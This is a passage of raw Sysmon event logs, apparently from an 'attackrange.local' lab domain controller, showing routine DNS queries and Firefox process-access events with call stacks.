Firefox\firefox.exe 22542200x800000000000000018454Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:00.917{59A5CD1D-945A-6005-3305-00000000A301}7052pki-goog.l.google.com02a00:1450:4001:81b::2003;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018453Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:00.915{59A5CD1D-945A-6005-3305-00000000A301}7052pki-goog.l.google.com0216.58.212.131;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018452Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:00.915{59A5CD1D-945A-6005-3305-00000000A301}7052ocsp.pki.goog0type: 5 pki-goog.l.google.com;::ffff:216.58.212.131;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018451Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:00.906{59A5CD1D-945A-6005-3305-00000000A301}7052r3.sn-4g5edns7.gvt1.com0173.194.188.8;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018450Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:00.905{59A5CD1D-945A-6005-3305-00000000A301}7052r3---sn-4g5edns7.gvt1.com0type: 5 r3.sn-4g5edns7.gvt1.com;::ffff:173.194.188.8;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018449Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:00.879{59A5CD1D-945A-6005-3305-00000000A301}7052redirector.gvt1.com02a00:1450:4001:81f::200e;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018448Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:00.877{59A5CD1D-945A-6005-3305-00000000A301}7052redirector.gvt1.com0172.217.21.206;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018447Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:00.876{59A5CD1D-945A-6005-3305-00000000A301}7052redirector.gvt1.com0::ffff:172.217.21.206;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000018459Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:01.239{59A5CD1D-8E56-6005-2E00-00000000A301}2464201.181.244.35.in-addr.arpa.0type: 12 201.181.244.35.bc.googleusercontent.com;C:\Windows\sysmon64.exe 22542200x800000000000000018458Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:01.229{59A5CD1D-8E56-6005-2E00-00000000A301}2464119.156.227.13.in-addr.arpa.0type: 12 server-13-227-156-119.muc51.r.cloudfront.net;C:\Windows\sysmon64.exe 22542200x800000000000000018461Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:03.248{59A5CD1D-8E56-6005-2E00-00000000A301}246414.94.204.143.in-addr.arpa.0type: 12 server-143-204-94-14.fra50.r.cloudfront.net;C:\Windows\sysmon64.exe 22542200x800000000000000018460Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:02.263{59A5CD1D-8E56-6005-2E00-00000000A301}24648.188.194.173.in-addr.arpa.9003-C:\Windows\sysmon64.exe 10341000x800000000000000018463Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:06.169{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000018462Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:06.169{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000018465Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:07.505{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000018464Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:07.505{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000018469Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:18.639{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561 10341000x800000000000000018468Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:18.639{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000018467Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:18.639{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000018466Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:18.639{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+327dd8a|C:\Program Files\Mozilla Firefox\xul.dll+327d3d4|C:\Program Files\Mozilla Firefox\xul.dll+328bf18|C:\Program Files\Mozilla Firefox\xul.dll+485b8b|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21 10341000x800000000000000018472Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:19.920{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561 10341000x800000000000000018471Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:19.920{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000018470Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:19.920{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000018487Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:20.748{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561 10341000x800000000000000018486Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:20.748{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000018485Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:20.748{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000018484Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:20.670{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561 10341000x800000000000000018483Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:20.670{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla 